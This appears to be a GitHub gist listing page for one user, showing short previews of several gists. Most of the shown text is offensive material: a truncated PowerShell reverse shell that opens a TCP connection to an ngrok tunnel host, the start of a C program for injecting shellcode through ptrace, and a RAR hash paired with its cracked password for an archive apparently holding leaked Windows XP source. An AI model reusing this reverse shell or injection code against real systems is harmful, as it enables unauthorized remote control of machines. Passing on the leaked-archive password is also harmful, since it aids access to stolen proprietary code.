Skip to content

Instantly share code, notes, and snippets.

@w1redch4d
w1redch4d / winxp-src.rar
Created May 7, 2024 13:46
password for winxp-src.rar
$RAR3$*0*c9292efa2e495f90*044d2e5042869449c10f890c1cced438 ---> internaldev
@w1redch4d
w1redch4d / rsa.py
Created April 7, 2023 18:07
Idk what tf i was doing at 4am
# import random
import math
from z3 import *
prime = 7919*7583
def isPrime(x):
y, z = Ints("y z")
return And(x > 1, Not(Exists([y, z], And(y < x, z < x, y > 1, z > 1, x == y*z))))
@w1redch4d
w1redch4d / ptrace_inject.c
Last active February 28, 2023 18:54
PTRACE inject shellcode to a child process by loading your desired elf without modifying /proc/sys/kernel/yama/ptrace_scope
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
@w1redch4d
w1redch4d / mini-reverse.ps1
Last active September 21, 2022 19:04 — forked from staaldraad/mini-reverse.ps1
A reverse shell in Powershell
$socket = new-object System.Net.Sockets.TcpClient('0.tcp.in.ngrok.io', 17608);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
$read = $null;